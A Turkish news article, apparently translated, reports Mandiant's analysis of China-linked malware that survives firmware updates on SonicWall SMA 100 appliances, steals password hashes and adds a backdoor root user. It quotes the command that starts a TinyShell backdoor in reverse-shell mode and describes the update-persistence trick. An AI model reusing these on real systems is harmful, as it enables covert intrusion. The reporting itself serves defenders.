Güncelleştirmeye dayanıklı kötü amaçlı yazılım, oldukça motive olmuş tehdit aktörleri tarafından oluşturulan bir modelin parçasıdır.
Araştırmacılar, Çin hükümetiyle bağlantısı olan tehdit aktörlerinin, SonicWall'ın yaygın olarak kullanılan bir güvenlik cihazına, cihaz üretici yazılımı güncellemelerini aldıktan sonra bile aktif kalan kötü amaçlı yazılım bulaştırdığını söyledi.
SonicWall Secure Mobile Access 100, kuruluşların uzaktan iş gücünü güvenli bir şekilde dağıtmasına yardımcı olan güvenli bir uzaktan erişim cihazıdır. Müşteriler, uzak kullanıcılara ayrıntılı erişim denetimleri vermek, kuruluş ağlarına VPN bağlantıları sağlamak ve her çalışan için benzersiz profiller ayarlamak için kullanır. SMA 100'ün müşteri ağlarına erişimi, onu tehdit aktörleri için çekici bir hedef haline getiriyor.
2021'de cihaz, o zamanlar sıfırıncı gün güvenlik açığı olan bir güvenlik açığından yararlanan gelişmiş bilgisayar korsanları tarafından saldırıya uğradı. Fortinet ve Pulse Secure'un güvenlik cihazları son yıllarda benzer saldırılara maruz kaldı.
Ağlar içinde uzun vadeli kalıcılık elde etme
Perşembe günü, güvenlik şirketi Mandiant, Çin ile şüpheli bir bağlantısı olan tehdit aktörlerinin yama uygulanmamış SonicWall SMA cihazlarında kötü amaçlı yazılım çalıştırarak uzun vadeli kalıcılığı sürdürmek için bir kampanya yürüttüğünü belirten bir rapor yayınladı. Kampanya, kötü amaçlı yazılımın, ürün yazılımı yeni ürün yazılımı aldıktan sonra bile cihazlarda kalabilmesi açısından dikkate değerdi.
Mandiant araştırmacıları Daniel Lee, Stephen Eckels ve Ben Read, "Saldırganlar araçlarının kararlılığı ve kalıcılığı için önemli çaba sarf ediyor" diye yazdı. "Bu, ağa erişimlerinin ürün yazılımı güncellemeleri aracılığıyla devam etmesine ve SonicWall Cihazı aracılığıyla ağ üzerinde bir yer tutmasına izin veriyor."
Bu kalıcılığı elde etmek için, kötü amaçlı yazılım her 10 saniyede bir mevcut üretici yazılımı güncellemelerini kontrol eder. Bir güncelleme kullanıma sunulduğunda, kötü amaçlı yazılım arşivlenmiş dosyayı yedekleme için kopyalar, sıkıştırılmış dosyayı açar, bağlar ve ardından tüm kötü amaçlı dosya paketini ona kopyalar. Kötü amaçlı yazılım, bağlanan dosyaya bir arka kapı kök kullanıcısı da ekler. Ardından, kötü amaçlı yazılım, yüklemeye hazır olması için dosyayı yeniden sıkıştırır.
Araştırmacılar, "Teknik özellikle karmaşık değil, ancak saldırganın cihaz güncelleme döngüsünü anlamak, ardından kalıcılık için bir yöntem geliştirmek ve test etmek için büyük çaba sarf ettiğini gösteriyor" diye yazdı.
Kalıcılık teknikleri, Pulse Secure cihazlarına bulaşmak için 16 kötü amaçlı yazılım ailesini kullanan 2021'deki bir saldırı kampanyasıyla tutarlıdır. Mandiant saldırıları, şirketin "Çin hükümetinin temel önceliklerini" desteklediğini söylediği UNC2630, UNC2717 olarak izlenenler de dahil olmak üzere çok sayıda tehdit grubuna bağladı. Mandiant, SonicWall SMA 100 müşterilerine yönelik devam eden saldırıları UNC4540 olarak izlenen bir gruba bağladı.
"Son yıllarda Çinli saldırganlar, tam kurumsal izinsiz girişe giden bir yol olarak İnternet'e bakan çeşitli ağ aygıtları için birden çok sıfır gün açıklarından yararlanma ve kötü amaçlı yazılım dağıttı ve burada bildirilen örnek, Mandiant'ın devam etmesini beklediği yakın tarihli bir modelin parçası. yakın dönem," diye yazdı Mandiant araştırmacıları Perşembe günkü raporunda.
Yüksek ayrıcalıklı erişim
Kötü amaçlı yazılımın ana amacı, oturum açmış tüm kullanıcılar için kriptografik olarak hashlenmiş parolaları çalmak gibi görünüyor. Ayrıca, tehdit aktörünün yeni kötü amaçlı yazılım yüklemek için kullanabileceği bir web kabuğu sağlar.
Araştırmacılar Perşembe günkü raporda, "Güvenliği ihlal edilmiş bir cihazın analizi, saldırganın cihaza son derece ayrıcalıklı ve erişilebilir bir erişim sağlayan bir dosya koleksiyonunu ortaya çıkardı" diye yazdı. “Kötü amaçlı yazılım, bir dizi bash betiğinden ve TinyShell varyantı olarak tanımlanan tek bir ELF ikili dosyasından oluşuyor. Kötü amaçlı bash betikleri paketinin genel davranışı, aracın ayrıntılı bir şekilde anlaşıldığını gösterir ve kararlılık ve kalıcılık sağlamak için sisteme iyi uyarlanmıştır."
Kötü amaçlı yazılımların listesi:
Rapor şöyle devam etti:
Ana kötü amaçlı yazılım giriş noktası, güvenlik duvarı adlı bir bash betiğidir ve birincil döngüsünü sistemdeki her dosyanın karesi için bir kez yürütür: …for j in $(ls / -R) do for i in $(ls / -R ) do:… Betik, kimlik bilgilerinin çalınmasını ve diğer bileşenlerin çalıştırılmasını gerçekleştirmek için bir SQL komutunun yürütülmesinden sorumludur.Firewalld'deki ilk işlev, httpsd işlemi zaten çalışmıyorsa nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & komutuyla TinyShell arka kapısını httpsd yürütür. Bu, TinyShell'i ters kabuk moduna ayarlar ve ona, -d bayrağı tarafından tanımlanan bir işaret aralığı ile -m bayrağıyla temsil edilen belirli bir saat ve günde yukarıda bahsedilen IP adresine ve bağlantı noktasına seslenmesi talimatını verir. İkili, IP adresi bağımsız değişkeni boş bırakılırsa ters kabuk modunda kullanılan, sabit kodlanmış bir IP adresini katıştırır. Ayrıca bir dinleme bağlama kabuğu modu da mevcuttur.
Araştırmacılar, ilk enfeksiyon vektörünün ne olduğunu bilmediklerini söylediler.
Geçen hafta SonicWall, SMA 100 kullanıcılarını 10.2.1.7 veya daha yüksek bir sürüme yükseltmeye teşvik eden bir danışma belgesi yayınladı. Bu sürümler, Dosya Bütünlüğü İzleme ve anormal işlem tanımlama gibi geliştirmeleri içerir. Yama burada mevcuttur. Kullanıcılar ayrıca, anormal girişler veya dahili trafik dahil olmak üzere güvenlik ihlali belirtileri için günlükleri düzenli olarak incelemelidir.
Tags:
Bilgi Teknolojisi